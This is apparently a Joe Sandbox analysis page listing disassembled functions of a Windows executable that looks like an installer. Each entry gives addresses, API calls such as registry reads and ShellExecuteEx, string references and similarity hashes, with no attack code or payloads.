Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
UnregisterClassA.USER32(?,00400000), ref: 004164BB
RegisterClassA.USER32(?), ref: 004164DE

Strings

@, xrefs: 00416439

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 7b25cfcb3d4f9f28465275db2d67cdf9f267fbcc740a3ff75a925c386f358e46
Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
Opcode Fuzzy Hash: 7b25cfcb3d4f9f28465275db2d67cdf9f267fbcc740a3ff75a925c386f358e46
Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A

Function 004547AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(0000003C), ref: 00454848
GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Strings

<, xrefs: 00454802
SuG, xrefs: 00454873

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DirectoryErrorExecuteLastShellSystem
String ID: <$SuG
API String ID: 893404051-1504269210
Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98

Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
ExitProcess.KERNEL32 ref: 00404E0D

Strings

Error, xrefs: 00404DB9
Runtime error at 00000000, xrefs: 00404DBE, 00404DD1

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF

Function 00455DF4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75

Strings

LoadTypeLib, xrefs: 00455E53
RegisterTypeLib, xrefs: 00455E80

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54

Function 0045634C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403

Strings

Failed to create DebugClientWnd, xrefs: 004563CC
Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
API String ID: 3850602802-3720027226
Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
Opcode Fuzzy Hash: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE

Function 00477194 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

GetFocus.USER32 ref: 004771FF
GetKeyState.USER32(0000007A), ref: 00477211
WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B

Strings

Wnd=$%x, xrefs: 004771E3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FocusMessageStateTextWaitWindow
String ID: Wnd=$%x
API String ID: 1381870634-2927251529
Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
Opcode Fuzzy Hash: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A

Function 0046D638 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F

Strings

(invalid), xrefs: 0046D6D2
%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 0046D6C4

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
Opcode Fuzzy Hash: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77

Function 00458A84 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1

Strings

SOFTWARE\Microsoft\.NETFramework, xrefs: 00458AA4
InstallRoot, xrefs: 00458AC0
.NET Framework not found, xrefs: 00458AE0

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A

Function 00481F38 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C

Strings

CSDVersion, xrefs: 00481F70
System\CurrentControlSet\Control\Windows, xrefs: 00481F46

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 3677997916-1910633163
Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A

Function 0042D8BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC

Strings

GetSystemWow64DirectoryA, xrefs: 0042D8CC
kernel32.dll, xrefs: 0042D8D1

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 1646373207-4063490227
Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD

Function 0042E9C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC

Strings

ShutdownBlockReasonDestroy, xrefs: 0042E9CC
user32.dll, xrefs: 0042E9D1

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD

Function 00496E2C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C

Strings

user32.dll, xrefs: 00496E31
DisableProcessWindowsGhosting, xrefs: 00496E2C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E

Function 00463D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B

LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31

Strings

SHPathPrepareForWriteA, xrefs: 00463D21
shell32.dll, xrefs: 00463D26

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2238633743-2683653824
Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F

Function 0047C274 Relevance: 6.2, APIs: 4, Instructions: 194fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,?,00000000,?,0047C68D), ref: 0047C3C0
FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,?,00000000,?,0047C68D,00000000), ref: 0047C3DE

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54

Function 0047452C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA

Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31

GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A

Strings

, xrefs: 004745C2, 004745DD
LoggedMsgBox returned an unexpected value. Assuming Cancel., xrefs: 0047465F
MoveFileEx, xrefs: 004745EF

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CountErrorFileLastMoveTick
String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
API String ID: 2406187244-2685451598
Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9

Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00413D56
GetDesktopWindow.USER32 ref: 00413E0E

Part of subcall function 00418ED0: 6FA0C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09

SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
